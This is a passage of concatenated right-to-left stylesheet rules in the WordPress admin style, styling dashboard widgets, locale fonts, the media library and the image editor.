left; } #description-wrap { margin-top: 12px; } #quick-press textarea#content { min-height: 90px; max-height: 1300px; margin: 0 0 8px; padding: 8px 12px; resize: none; } /* Dashboard Quick Draft - Drafts list */ .js #dashboard_quick_press .drafts { border-top: 1px solid #f0f0f1; } #dashboard_quick_press .drafts abbr { border: none; } #dashboard_quick_press .drafts .view-all { float: left; margin: 0 0 0 12px; } #dashboard_primary a.rsswidget { font-weight: 400; } #dashboard_quick_press .drafts ul { margin: 0 12px; } #dashboard_quick_press .drafts li { margin-bottom: 1em; } #dashboard_quick_press .drafts li time { color: #646970; } #dashboard_quick_press .drafts p { margin: 0; word-wrap: break-word; } #dashboard_quick_press .draft-title { word-wrap: break-word; } #dashboard_quick_press .draft-title a, #dashboard_quick_press .draft-title time { margin: 0 0 0 5px; } /* Dashboard common styles */ #dashboard-widgets h4, /* Back-compat for pre-4.4 */ #dashboard-widgets h3, #dashboard_quick_press .drafts h2 { margin: 0 12px 8px; padding: 0; font-size: 14px; font-weight: 400; color: #1d2327; } #dashboard_quick_press .drafts h2 { line-height: inherit; } #dashboard-widgets .inside h4, /* Back-compat for pre-4.4 */ #dashboard-widgets .inside h3 { margin-right: 0; margin-left: 0; } /* Dashboard activity widget */ #dashboard_activity .comment-meta span.approve:before { content: "\f227"; content: "\f227" / ''; font: 20px/.5 dashicons; margin-right: 5px; vertical-align: middle; position: relative; top: -1px; margin-left: 2px; } #dashboard_activity .inside { margin: 0; padding: 0 12px; } #dashboard_activity .no-activity { overflow: hidden; padding: 12px 0; text-align: center; } #dashboard_activity .no-activity p { color: #646970; font-size: 16px; } #dashboard_activity .subsubsub { float: none; border-top: 1px solid #f0f0f1; margin: 0 -12px; padding: 8px 12px 4px; } #dashboard_activity .subsubsub a .count, #dashboard_activity .subsubsub a.current .count { color: #646970; /* white background on the dashboard but #f0f0f1 on list tables */ } #future-posts ul, #published-posts ul { margin: 8px -12px 0 -12px; } #future-posts li, #published-posts li { display: grid; grid-template-columns: clamp(160px, calc(2vw + 140px), 200px) auto; column-gap: 10px; color: #646970; padding: 4px 12px; } #future-posts li:nth-child(odd), #published-posts li:nth-child(odd) { background-color: #f6f7f7; } .activity-block { border-bottom: 1px solid #f0f0f1; margin: 0 -12px 6px -12px; padding: 8px 12px 4px; } .activity-block:last-child { border-bottom: none; margin-bottom: 0; } .activity-block .subsubsub li { color: #646970; } /* Dashboard activity widget - Comments */ /* @todo: needs serious de-duplication */ #activity-widget #the-comment-list tr.undo, #activity-widget #the-comment-list div.undo { background: none; padding: 6px 0; margin-right: 12px; } #activity-widget #the-comment-list .comment-item { background: #f6f7f7; padding: 12px; position: relative; } #activity-widget #the-comment-list .avatar { position: absolute; top: 12px; } #activity-widget #the-comment-list .dashboard-comment-wrap.has-avatar { padding-right: 63px; } #activity-widget #the-comment-list .dashboard-comment-wrap blockquote { margin: 1em 0; } #activity-widget #the-comment-list .comment-item p.row-actions { margin: 4px 0 0; } #activity-widget #the-comment-list .comment-item:first-child { border-top: 1px solid #f0f0f1; } #activity-widget #the-comment-list .unapproved { background-color: #fcf9e8; } #activity-widget #the-comment-list .unapproved:before { content: ""; display: block; position: absolute; right: 0; top: 0; bottom: 0; background: #d63638; width: 4px; } #activity-widget #the-comment-list .spam-undo-inside .avatar, #activity-widget #the-comment-list .trash-undo-inside .avatar { position: relative; top: 0; } /* Browse happy box */ #dashboard-widgets #dashboard_browser_nag.postbox .inside { margin: 10px; } .postbox .button-link .edit-box { display: none; } .edit-box { opacity: 0; } .hndle:hover .edit-box, .edit-box:focus { opacity: 1; } #dashboard-widgets form .input-text-wrap input { width: 100%; } #dashboard-widgets form .textarea-wrap textarea { width: 100%; } #dashboard-widgets .postbox form .submit { float: none; margin: .5em 0 0; padding: 0; border: none; } #dashboard-widgets-wrap #dashboard-widgets .postbox form .submit #publish { min-width: 0; } #dashboard-widgets li a, #dashboard-widgets .button-link, .community-events-footer a { text-decoration: none; } #dashboard-widgets h2 a { text-decoration: underline; } #dashboard-widgets .hndle .postbox-title-action { float: left; line-height: 1.2; } #dashboard_plugins h5 { font-size: 14px; } /* Recent Comments */ #latest-comments #the-comment-list { position: relative; margin: 0 -12px; } #activity-widget #the-comment-list .comment, #activity-widget #the-comment-list .pingback { box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.06); } #activity-widget .comments #the-comment-list .alt { background-color: transparent; } #activity-widget #latest-comments #the-comment-list .comment-item { /* the row-actions paragraph is output only for users with 'edit_comment' capabilities, for other users this needs a min height equal to the gravatar image */ min-height: 50px; margin: 0; padding: 12px; } #latest-comments #the-comment-list .pingback { padding-right: 12px !important; } #latest-comments #the-comment-list .comment-item:first-child { border-top: none; } #latest-comments #the-comment-list .comment-meta { line-height: 1.5; margin: 0; color: #646970; } #latest-comments #the-comment-list .comment-meta cite { font-style: normal; font-weight: 400; } #latest-comments #the-comment-list .comment-item blockquote, #latest-comments #the-comment-list .comment-item blockquote p { margin: 0; padding: 0; display: inline; } #latest-comments #the-comment-list .comment-item p.row-actions { margin: 3px 0 0; padding: 0; font-size: 13px; } /* Feeds */ .rss-widget ul { margin: 0; padding: 0; list-style: none; } a.rsswidget { font-size: 13px; font-weight: 600; line-height: 1.4; } .rss-widget ul li { line-height: 1.5; margin-bottom: 12px; } .rss-widget span.rss-date { color: #646970; font-size: 13px; margin-right: 3px; } .rss-widget cite { display: block; text-align: left; margin: 0 0 1em; padding: 0; } .rss-widget cite:before { content: "\2014"; content: "\2014" / ''; } .dashboard-comment-wrap { word-wrap: break-word; } /* Browser Nag */ #dashboard_browser_nag a.update-browser-link { font-size: 1.2em; font-weight: 600; } #dashboard_browser_nag a { text-decoration: underline; } #dashboard_browser_nag p.browser-update-nag.has-browser-icon { padding-left: 128px; } #dashboard_browser_nag .browser-icon { margin-top: -32px; } #dashboard_browser_nag.postbox { background-color: #b32d2e; background-image: none; border-color: #b32d2e; color: #fff; box-shadow: none; } #dashboard_browser_nag.postbox h2 { border-bottom-color: transparent; background: transparent none; color: #fff; box-shadow: none; } #dashboard_browser_nag a { color: #fff; } #dashboard_browser_nag.postbox .postbox-header { border-color: transparent; } #dashboard_browser_nag h2.hndle { border: none; font-weight: 600; font-size: 20px; padding-top: 10px; } .postbox#dashboard_browser_nag p a.dismiss { font-size: 14px; } .postbox#dashboard_browser_nag p, .postbox#dashboard_browser_nag a, .postbox#dashboard_browser_nag p.browser-update-nag { font-size: 16px; } /* PHP Nag */ #dashboard_php_nag .dashicons-warning { color: #dba617; padding-left: 6px; } #dashboard_php_nag.php-no-security-updates .dashicons-warning, #dashboard_php_nag.php-version-lower-than-future-minimum .dashicons-warning { color: #d63638; } #dashboard_php_nag h2 { display: inline-block; } #dashboard_php_nag p { margin: 12px 0; } .bigger-bolder-text { font-weight: 600; font-size: 14px; } /* =Media Queries -------------------------------------------------------------- */ @media only screen and (min-width: 1600px) { .welcome-panel .welcome-panel-column-container { display: flex; justify-content: center; } .welcome-panel-column { width: 100%; max-width: 460px; } } /* one column on the dash */ @media only screen and (max-width: 799px) { #wpbody-content #dashboard-widgets .postbox-container { width: 100%; } #dashboard-widgets .meta-box-sortables { min-height: 0; } .is-dragging-metaboxes #dashboard-widgets .meta-box-sortables { min-height: 100px; } #dashboard-widgets .meta-box-sortables.empty-container { margin-bottom: 0; } } /* two columns on the dash, but keep the setting if one is selected */ @media only screen and (min-width: 800px) and (max-width: 1499px) { #wpbody-content #dashboard-widgets .postbox-container { width: 49.5%; } #wpbody-content #dashboard-widgets #postbox-container-2, #wpbody-content #dashboard-widgets #postbox-container-3, #wpbody-content #dashboard-widgets #postbox-container-4 { float: left; width: 50.5%; } #dashboard-widgets #postbox-container-3 .empty-container, #dashboard-widgets #postbox-container-4 .empty-container { border: none; height: 0; min-height: 0; margin-bottom: 0; display: none; } #dashboard-widgets #postbox-container-3 .empty-container:after, #dashboard-widgets #postbox-container-4 .empty-container:after { display: none; } #wpbody #wpbody-content #dashboard-widgets.columns-1 .postbox-container { width: 100%; } #wpbody #dashboard-widgets .metabox-holder.columns-1 .postbox-container .empty-container { border: none; height: 0; min-height: 0; margin-bottom: 0; } /* show the radio buttons for column prefs only for one or two columns */ .index-php .screen-layout, .index-php .columns-prefs { display: block; } .columns-prefs .columns-prefs-3, .columns-prefs .columns-prefs-4 { display: none; } #dashboard-widgets .postbox-container .empty-container:after { display: block; } } /* three columns on the dash */ @media only screen and (min-width: 1500px) and (max-width: 1800px) { #wpbody-content #dashboard-widgets .postbox-container { width: 33.5%; } #wpbody-content #dashboard-widgets #postbox-container-1 { width: 33%; } #wpbody-content #dashboard-widgets #postbox-container-3, #wpbody-content #dashboard-widgets #postbox-container-4 { float: left; } #dashboard-widgets #postbox-container-4 .empty-container { border: none; height: 0; min-height: 0; margin-bottom: 0; display: none; } #dashboard-widgets #postbox-container-4 .empty-container:after { display: none; } #dashboard-widgets .postbox-container .empty-container:after { display: block; } } /* Always show the "Drag boxes here" CSS generated content on large screens. */ @media only screen and (min-width: 1801px) { #dashboard-widgets .postbox-container .empty-container:after { display: block; } } @media screen and (max-width: 870px) { /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column li { display: inline-block; margin-left: 13px; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column ul { margin: 0.4em 0 0; } } @media screen and (max-width: 1180px) and (min-width: 783px) { .welcome-panel-column { grid-template-columns: 1fr; } [class*="welcome-panel-icon"], .welcome-panel-column > svg { display: none; } } @media screen and (max-width: 782px) { .welcome-panel .welcome-panel-column-container { grid-template-columns: 1fr; box-sizing: border-box; padding: 32px; width: 100%; } .welcome-panel .welcome-panel-column-content { max-width: 520px; } /* Keep the close icon from overlapping the Welcome text. */ .welcome-panel .welcome-panel-close { overflow: hidden; text-indent: 40px; white-space: nowrap; width: 20px; height: 20px; padding: 5px; top: 5px; left: 5px; } .welcome-panel .welcome-panel-close::before { position: absolute; top: 5px; right: -35px; } #dashboard-widgets h2 { padding: 12px; } #dashboard_recent_comments #the-comment-list .comment-item .avatar { height: 30px; width: 30px; margin: 4px 0 5px 10px; } .community-events-toggle-location { height: 38px; vertical-align: baseline; } #community-events-submit { margin-bottom: 0; } .community-events-form label, #dashboard-widgets .community-events-cancel.button-link { /* Same properties as the submit button for cross-browsers alignment. */ font-size: 14px; line-height: normal; padding: 6px 0; border: 1px solid transparent; } } /* Smartphone */ @media screen and (max-width: 600px) { .welcome-panel-header { padding: 32px 32px 64px; } .welcome-panel-header-image { display: none; } } @media screen and (max-width: 480px) { .welcome-panel-column { gap: 16px; } } @media screen and (max-width: 360px) { .welcome-panel-column { grid-template-columns: 1fr; } [class*="welcome-panel-icon"], .welcome-panel-column > svg { display: none; } } @media screen and (min-width: 355px) { .community-events .event-info { display: table-row; float: right; max-width: 59%; } .event-icon, .event-icon[aria-hidden="true"] { display: table-cell; } .event-info-inner { display: table-cell; } .community-events .event-date-time { float: left; max-width: 39%; } .community-events .event-date, .community-events .event-time { text-align: left; } } /*! This file is auto-generated */ body.rtl,body.rtl .press-this a.wp-switch-editor{font-family:Tahoma,Arial,sans-serif}.rtl h1,.rtl h2,.rtl h3,.rtl h4,.rtl h5,.rtl h6{font-family:Arial,sans-serif;font-weight:600}body.locale-he-il,body.locale-he-il .press-this a.wp-switch-editor{font-family:Arial,sans-serif}.locale-he-il em{font-style:normal;font-weight:600}.locale-zh-cn #local-time,.locale-zh-cn #utc-time,.locale-zh-cn .form-wrap p,.locale-zh-cn .howto,.locale-zh-cn .inline-edit-row fieldset span.checkbox-title,.locale-zh-cn .inline-edit-row fieldset span.title,.locale-zh-cn .js .input-with-default-title,.locale-zh-cn .link-to-original,.locale-zh-cn .tablenav .displaying-num,.locale-zh-cn p.description,.locale-zh-cn p.help,.locale-zh-cn p.install-help,.locale-zh-cn span.description{font-style:normal}.locale-zh-cn .hdnle a{font-size:12px}.locale-zh-cn form.upgrade .hint{font-style:normal;font-size:100%}.locale-zh-cn #sort-buttons{font-size:1em!important}.locale-de-de #customize-header-actions .button,.locale-de-de-formal #customize-header-actions .button{padding:0 5px 1px}.locale-de-de #customize-header-actions .spinner,.locale-de-de-formal #customize-header-actions .spinner{margin:16px 3px 0}body[class*=locale-de-] .inline-edit-row fieldset label span.title,body[class*=locale-de-] .inline-edit-row fieldset.inline-edit-date legend{width:7em}body[class*=locale-de-] .inline-edit-row fieldset .timestamp-wrap,body[class*=locale-de-] .inline-edit-row fieldset label span.input-text-wrap{margin-right:7em}.locale-ru-ru #adminmenu{width:inherit}.locale-ru-ru #adminmenu,.locale-ru-ru #wpbody{margin-right:0}.locale-ru-ru .inline-edit-row fieldset label span.title,.locale-ru-ru .inline-edit-row fieldset.inline-edit-date legend{width:8em}.locale-ru-ru .inline-edit-row fieldset .timestamp-wrap,.locale-ru-ru .inline-edit-row fieldset label span.input-text-wrap{margin-right:8em}.locale-ru-ru.post-new-php .tagsdiv .newtag,.locale-ru-ru.post-php .tagsdiv .newtag{width:165px}.locale-ru-ru.press-this .posting{margin-left:277px}.locale-ru-ru .press-this-sidebar{width:265px}.locale-ru-ru #customize-header-actions .button{padding:0 5px 1px}.locale-ru-ru #customize-header-actions .spinner{margin:16px 3px 0}.locale-lt-lt .inline-edit-row fieldset label span.title,.locale-lt-lt .inline-edit-row fieldset.inline-edit-date legend{width:8em}.locale-lt-lt .inline-edit-row fieldset .timestamp-wrap,.locale-lt-lt .inline-edit-row fieldset label span.input-text-wrap{margin-right:8em}.locale-lt-lt .quick-edit-row-post fieldset.inline-edit-col-right label span.title,.locale-ru-ru .quick-edit-row-post fieldset.inline-edit-col-right label span.title,body[class*=locale-de-] .quick-edit-row-post fieldset.inline-edit-col-right label span.title{width:auto}@media screen and (max-width:782px){.locale-lt-lt .inline-edit-row fieldset .timestamp-wrap,.locale-lt-lt .inline-edit-row fieldset label span.input-text-wrap,.locale-ru-ru .inline-edit-row fieldset .timestamp-wrap,.locale-ru-ru .inline-edit-row fieldset label span.input-text-wrap,body[class*=locale-de-] .inline-edit-row fieldset .timestamp-wrap,body[class*=locale-de-] .inline-edit-row fieldset label span.input-text-wrap{margin-right:0}}/*! This file is auto-generated */ /*------------------------------------------------------------------------------ 14.0 - Media Screen ------------------------------------------------------------------------------*/ .media-item .describe { border-collapse: collapse; width: 100%; border-top: 1px solid #dcdcde; clear: both; cursor: default; } .media-item.media-blank .describe { border: 0; } .media-item .describe th { vertical-align: top; text-align: right; padding: 5px 10px 10px; width: 140px; } .media-item .describe .align th { padding-top: 0; } .media-item .media-item-info tr { background-color: transparent; } .media-item .describe td { padding: 0 0 8px 8px; vertical-align: top; } .media-item thead.media-item-info td { padding: 4px 10px 0; } .media-item .media-item-info .A1B1 { padding: 0 10px 0 0; } .media-item td.savesend { padding-bottom: 15px; } .media-item .thumbnail { max-height: 128px; max-width: 128px; } .media-list-subtitle { display: block; } .media-list-title { display: block; } #wpbody-content #async-upload-wrap a { display: none; } .media-upload-form { margin-top: 20px; } .media-upload-form td label { margin-left: 6px; margin-right: 2px; } .media-upload-form .align .field label { display: inline; padding: 0 23px 0 0; margin: 0 3px 0 1em; font-weight: 600; } .media-upload-form tr.image-size label { margin: 0 5px 0 0; font-weight: 600; } .media-upload-form th.label label { font-weight: 600; margin: 0.5em; font-size: 13px; } .media-upload-form th.label label span { padding: 0 5px; } .media-item .describe input[type="text"], .media-item .describe textarea { width: 460px; } .media-item .describe p.help { margin: 0; padding: 0 5px 0 0; } .describe-toggle-on, .describe-toggle-off { display: block; line-height: 2.76923076; float: left; margin-left: 10px; } .media-item .attachment-tools { display: flex; align-items: center; } .media-item .edit-attachment { padding: 14px 0; display: block; margin-left: 10px; } .media-item .edit-attachment.copy-to-clipboard-container { display: flex; margin-top: 0; } .media-item-copy-container .success { line-height: 0; } .media-item button .copy-attachment-url { margin-top: 14px; } .media-item .copy-to-clipboard-container { margin-top: 7px; } .media-item .describe-toggle-off, .media-item.open .describe-toggle-on { display: none; } .media-item.open .describe-toggle-off { display: block; } .media-upload-form .media-item { min-height: 70px; margin-bottom: 1px; position: relative; width: 100%; background: #fff; } .media-upload-form .media-item, .media-upload-form .media-item .error { box-shadow: 0 1px 0 #dcdcde; } #media-items:empty { border: 0 none; } .media-item .filename { padding: 14px 2px; overflow: hidden; margin-right: 4px; } .media-item .pinkynail { float: right; margin: 14px; max-height: 70px; max-width: 70px; } .media-item .startopen, .media-item .startclosed { display: none; } .media-item .progress { display: inline-block; height: 22px; margin: 0 6px 7px; width: 200px; line-height: 2em; padding: 0; overflow: hidden; border-radius: 22px; background: #dcdcde; box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1); } .media-item .bar { z-index: 9; width: 0; height: 100%; margin-top: -22px; border-radius: 22px; background-color: #2271b1; box-shadow: inset 0 0 2px rgba(0, 0, 0, 0.3); } .media-item .progress .percent { z-index: 10; position: relative; width: 200px; padding: 0; color: #fff; text-align: center; line-height: 22px; font-weight: 400; text-shadow: 0 1px 2px rgba(0, 0, 0, 0.2); } .upload-php .fixed .column-parent { width: 15%; } .js .html-uploader #plupload-upload-ui { display: none; } .js .html-uploader #html-upload-ui { display: block; } #html-upload-ui #async-upload { font-size: 1em; } .media-upload-form .media-item.error, .media-upload-form .media-item .error { width: auto; margin: 0 0 1px; } .media-upload-form .media-item .error { padding: 10px 14px 10px 0; min-height: 50px; } .media-item .error-div button.dismiss { float: left; margin: 0 15px 0 10px; } /*------------------------------------------------------------------------------ 14.1 - Media Library ------------------------------------------------------------------------------*/ .find-box { background-color: #fff; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); width: 600px; overflow: hidden; margin-right: -300px; position: fixed; top: 30px; bottom: 30px; right: 50%; z-index: 100105; } .find-box-head { background: #fff; border-bottom: 1px solid #dcdcde; height: 36px; font-size: 18px; font-weight: 600; line-height: 2; padding: 0 16px 0 36px; position: absolute; top: 0; right: 0; left: 0; } .find-box-inside { overflow: auto; padding: 16px; background-color: #fff; position: absolute; top: 37px; bottom: 45px; overflow-y: scroll; width: 100%; box-sizing: border-box; } .find-box-search { padding-bottom: 16px; } .find-box-search .spinner { float: none; right: 105px; position: absolute; } .find-box-search, #find-posts-response { position: relative; /* RTL fix, #WP28010 */ } #find-posts-input, #find-posts-search { float: right; } #find-posts-input { width: 140px; height: 28px; margin: 0 0 0 4px; } .widefat .found-radio { padding-left: 0; width: 16px; } #find-posts-close { width: 36px; height: 36px; border: none; padding: 0; position: absolute; top: 0; left: 0; cursor: pointer; text-align: center; background: none; color: #646970; } #find-posts-close:hover, #find-posts-close:focus { color: var(--wp-admin-theme-color-darker-20, #183ad6); } #find-posts-close:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } #find-posts-close:before { font: normal 20px/36px dashicons; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; content: "\f158"; content: "\f158" / ''; } .find-box-buttons { padding: 8px 16px; background: #fff; border-top: 1px solid #dcdcde; position: absolute; bottom: 0; right: 0; left: 0; } @media screen and (max-width: 782px) { .find-box-inside { bottom: 57px; } #delete_all { margin-bottom: 0; } } @media screen and (max-width: 660px) { .find-box { top: 0; bottom: 0; right: 0; left: 0; margin: 0; width: 100%; } } .ui-find-overlay { position: fixed; top: 0; right: 0; left: 0; bottom: 0; background: #000; opacity: 0.7; filter: alpha(opacity=70); z-index: 100100; } .drag-drop #drag-drop-area { border: 4px dashed #c3c4c7; height: 200px; } .drag-drop .drag-drop-inside { margin: 60px auto 0; width: 250px; } .drag-drop-inside p { font-size: 14px; margin: 5px 0; display: none; } .drag-drop .drag-drop-inside p { text-align: center; } .drag-drop-inside p.drag-drop-info { font-size: 20px; } .drag-drop .drag-drop-inside p, .drag-drop-inside p.drag-drop-buttons { display: block; } /* #drag-drop-area:-moz-drag-over { border-color: #83b4d8; } border color while dragging a file over the uploader drop area */ .drag-drop.drag-over #drag-drop-area { border-color: #9ec2e6; } #plupload-upload-ui { position: relative; } .post-type-attachment .wp-filter select { margin: 0 0 0 6px; } /** * Media Library grid view */ .media-frame.mode-grid, .media-frame.mode-grid .media-frame-content, .media-frame.mode-grid .attachments-browser:not(.has-load-more) .attachments, .media-frame.mode-grid .attachments-browser.has-load-more .attachments-wrapper, .media-frame.mode-grid .uploader-inline-content { position: static; } /* Regions we don't use at all */ .media-frame.mode-grid .media-frame-title, .media-frame.mode-grid .media-frame-router, .media-frame.mode-grid .media-frame-menu { display: none; } .media-frame.mode-grid .media-frame-content { background-color: transparent; border: none; } .upload-php .mode-grid .media-sidebar { position: relative; width: auto; margin-top: 12px; padding: 0 16px; border-right: 4px solid #d63638; box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1); background-color: #fff; } .upload-php .mode-grid .hide-sidebar .media-sidebar { display: none; } .upload-php .mode-grid .media-sidebar .media-uploader-status { border-bottom: none; padding-bottom: 0; max-width: 100%; } .upload-php .mode-grid .media-sidebar .upload-error { margin: 12px 0; padding: 4px 0 0; border: none; box-shadow: none; background: none; } .upload-php .mode-grid .media-sidebar .media-uploader-status.errors h2 { display: none; } .media-frame.mode-grid .uploader-inline { position: relative; top: auto; left: auto; right: auto; bottom: auto; padding-top: 0; margin-top: 20px; border: 4px dashed #c3c4c7; } .media-frame.mode-select .attachments-browser.fixed:not(.has-load-more) .attachments, .media-frame.mode-select .attachments-browser.has-load-more.fixed .attachments-wrapper { position: relative; top: 94px; /* prevent jumping up when the toolbar becomes fixed */ padding-bottom: 94px; /* offset for above so the bottom doesn't get cut off */ } .media-frame.mode-grid .attachment:focus, .media-frame.mode-grid .selected.attachment:focus, .media-frame.mode-grid .attachment.details:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -6px; } .media-frame.mode-grid .selected.attachment { box-shadow: inset 0 0 0 5px #f0f0f1, inset 0 0 0 7px #c3c4c7; } .media-frame.mode-grid .attachment.details { box-shadow: inset 0 0 0 3px #f0f0f1, inset 0 0 0 7px var(--wp-admin-theme-color, #3858e9); } .media-frame.mode-grid.mode-select .attachment .thumbnail { opacity: 0.65; } .media-frame.mode-select .attachment.selected .thumbnail { opacity: 1; } .media-frame.mode-grid .media-toolbar { margin-bottom: 15px; height: auto; } .media-frame.mode-grid .media-toolbar label:not(.media-search-input-label) { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } .media-frame.mode-grid .media-toolbar select { margin: 0 0 0 10px; min-height: 32px; line-height: 2.14285714; /* 30px for 32px height with 14px font */ padding: 0 8px 0 24px; } .media-frame.mode-grid .media-toolbar input[type="search"] { min-height: 32px; padding: 0 8px; } .media-frame.mode-grid .media-toolbar-secondary { display: flex; flex-wrap: wrap; align-items: center; gap: 8px; } .media-frame.mode-grid.mode-edit .media-toolbar-secondary > .select-mode-toggle-button { margin: 0 0 0 8px; height: 100%; } .media-frame.mode-grid .attachments-browser .bulk-select { display: inline-block; margin: 0 0 0 10px; } .media-frame.mode-grid .search { margin-top: 0; } .media-frame-content .media-search-input-label { vertical-align: baseline; } .attachments-browser .media-toolbar-secondary > .media-button { margin-left: 10px; } .media-frame.mode-select .attachments-browser.fixed .media-toolbar { position: fixed; top: 32px; right: auto; left: 20px; margin-top: 0; } .media-frame.mode-grid .attachments-browser { padding: 0; } .media-frame.mode-grid .attachments-browser .attachments { padding: 2px; } .media-frame.mode-grid .attachments-browser .no-media { color: #646970; /* same as no plugins and no themes */ font-size: 18px; font-style: normal; margin: 0; padding: 100px 0 0; text-align: center; } /** * Attachment details modal */ .edit-attachment-frame { display: block; height: 100%; width: 100%; } .edit-attachment-frame .edit-media-header { overflow: hidden; } .upload-php .media-modal-close .media-modal-icon:before { content: "\f335"; content: "\f335" / ''; font-size: 22px; } .upload-php .media-modal-close, .edit-attachment-frame .edit-media-header .left, .edit-attachment-frame .edit-media-header .right { cursor: pointer; color: #787c82; background-color: transparent; height: 50px; width: 50px; padding: 0; position: absolute; text-align: center; border: 0; border-right: 1px solid #dcdcde; transition: color .1s ease-in-out, background .1s ease-in-out; } .upload-php .media-modal-close { top: 0; left: 0; } .edit-attachment-frame .edit-media-header .left { left: 102px; } .edit-attachment-frame .edit-media-header .right { left: 51px; } .edit-attachment-frame .media-frame-title { right: 0; left: 150px; /* leave space for prev/next/close */ } .edit-attachment-frame .edit-media-header .right:before, .edit-attachment-frame .edit-media-header .left:before { font: normal 20px/50px dashicons !important; display: inline; font-weight: 300; } .upload-php .media-modal-close:hover, .upload-php .media-modal-close:focus, .edit-attachment-frame .edit-media-header .left:hover, .edit-attachment-frame .edit-media-header .right:hover, .edit-attachment-frame .edit-media-header .left:focus, .edit-attachment-frame .edit-media-header .right:focus { background: #dcdcde; border-color: #c3c4c7; color: #000; outline: none; box-shadow: none; } .upload-php .media-modal-close:focus, .edit-attachment-frame .edit-media-header .left:focus, .edit-attachment-frame .edit-media-header .right:focus { /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .upload-php .media-modal-close:focus .media-modal-icon:before, .upload-php .media-modal-close:hover .media-modal-icon:before { color: #000; } .edit-attachment-frame .edit-media-header .left:before { content: "\f345"; content: "\f341" / ''; } .edit-attachment-frame .edit-media-header .right:before { content: "\f341"; content: "\f345" / ''; } .edit-attachment-frame .edit-media-header [disabled], .edit-attachment-frame .edit-media-header [disabled]:hover { color: #c3c4c7; background: inherit; cursor: default; } .edit-attachment-frame .media-frame-content, .edit-attachment-frame .media-frame-router { right: 0; } .edit-attachment-frame .media-frame-content { border-bottom: none; bottom: 0; top: 50px; } .edit-attachment-frame .attachment-details { position: absolute; overflow: auto; top: 0; bottom: 0; left: 0; right: 0; box-shadow: inset 0 4px 4px -4px rgba(0, 0, 0, 0.1); } .edit-attachment-frame .attachment-media-view { float: right; width: 65%; height: 100%; } .edit-attachment-frame .attachment-media-view .thumbnail { box-sizing: border-box; padding: 16px; height: 100%; } .edit-attachment-frame .attachment-media-view .details-image { display: block; margin: 0 auto 16px; max-width: 100%; max-height: 90%; max-height: calc( 100% - 56px ); /* leave space for actions underneath */ background-image: linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 100% 0, 10px 10px; background-size: 20px 20px; } .edit-attachment-frame .attachment-media-view .details-image.icon { background: none; } .edit-attachment-frame .attachment-media-view .attachment-actions { text-align: center; } .edit-attachment-frame .wp-media-wrapper { margin-bottom: 12px; } .edit-attachment-frame input, .edit-attachment-frame textarea { padding: 4px 8px; line-height: 1.42857143; } .edit-attachment-frame .attachment-info { overflow: auto; box-sizing: border-box; margin-bottom: 0; padding: 12px 16px 0; width: 35%; height: 100%; box-shadow: inset 0 4px 4px -4px rgba(0, 0, 0, 0.1); border-bottom: 0; border-right: 1px solid #dcdcde; background: #f6f7f7; } .edit-attachment-frame .attachment-info .details, .edit-attachment-frame .attachment-info .settings { position: relative; /* RTL fix, #WP29352 */ overflow: hidden; float: none; margin-bottom: 15px; padding-bottom: 15px; border-bottom: 1px solid #dcdcde; } .edit-attachment-frame .attachment-info .filename { font-weight: 400; color: #646970; } .edit-attachment-frame .attachment-info .thumbnail { margin-bottom: 12px; } .attachment-info .actions { margin-bottom: 16px; } .attachment-info .actions a { display: inline; text-decoration: none; } .copy-to-clipboard-container { display: flex; align-items: center; margin-top: 8px; clear: both; } .copy-to-clipboard-container .copy-attachment-url { white-space: normal; } .copy-to-clipboard-container .success { color: #007017; margin-right: 8px; } /*------------------------------------------------------------------------------ 14.2 - Image Editor ------------------------------------------------------------------------------*/ .wp_attachment_details .attachment-alt-text { margin-bottom: 5px; } .wp_attachment_details #attachment_alt { max-width: 500px; height: 3.28571428em; } .wp_attachment_details .attachment-alt-text-description { margin-top: 5px; } .wp_attachment_details label[for="content"] { font-size: 13px; line-height: 1.5; margin: 1em 0; } .wp_attachment_details #attachment_caption { height: 4em; } .describe .image-editor { vertical-align: top; } .imgedit-wrap { position: relative; padding-top: 10px; } .image-editor p, .image-editor fieldset { margin: 8px 0; } .image-editor legend { margin-bottom: 5px; } .describe .imgedit-wrap .image-editor { padding: 0 5px; } .wp_attachment_holder div.updated { margin-top: 0; } .wp_attachment_holder .imgedit-wrap > div { height: auto; } .imgedit-panel-content { display: flex; flex-wrap: wrap; gap: 20px; margin-bottom: 20px; } .imgedit-settings { max-width: 240px; /* Prevent reflow when help info is expanded. */ } .imgedit-group-controls > * { display: none; } .imgedit-panel-active .imgedit-group-controls > * { display: block; } .imgedit-panel-active .imgedit-group-controls > .imgedit-crop-apply { display: flex; } .imgedit-crop-apply { gap: 4px; flex-wrap: wrap; } .wp_attachment_holder .imgedit-wrap .image-editor { float: left; width: 250px; } .image-editor input { margin-top: 0; vertical-align: middle; } .imgedit-wait { position: absolute; top: 0; bottom: 0; width: 100%; background: #fff; opacity: 0.7; filter: alpha(opacity=70); display: none; } .imgedit-wait:before { content: ""; display: block; width: 20px; height: 20px; position: absolute; right: 50%; top: 50%; margin: -10px -10px 0 0; background: transparent url(../images/spinner.gif) no-repeat center; background-size: 20px 20px; transform: translateZ(0); } .no-float { float: none; } .media-disabled, .image-editor .disabled { /* WCAG 1.4.3 Text or images of text that are part of an inactive user interface component ... have no contrast requirement. */ color: #a7aaad; } .A1B1 { overflow: hidden; } 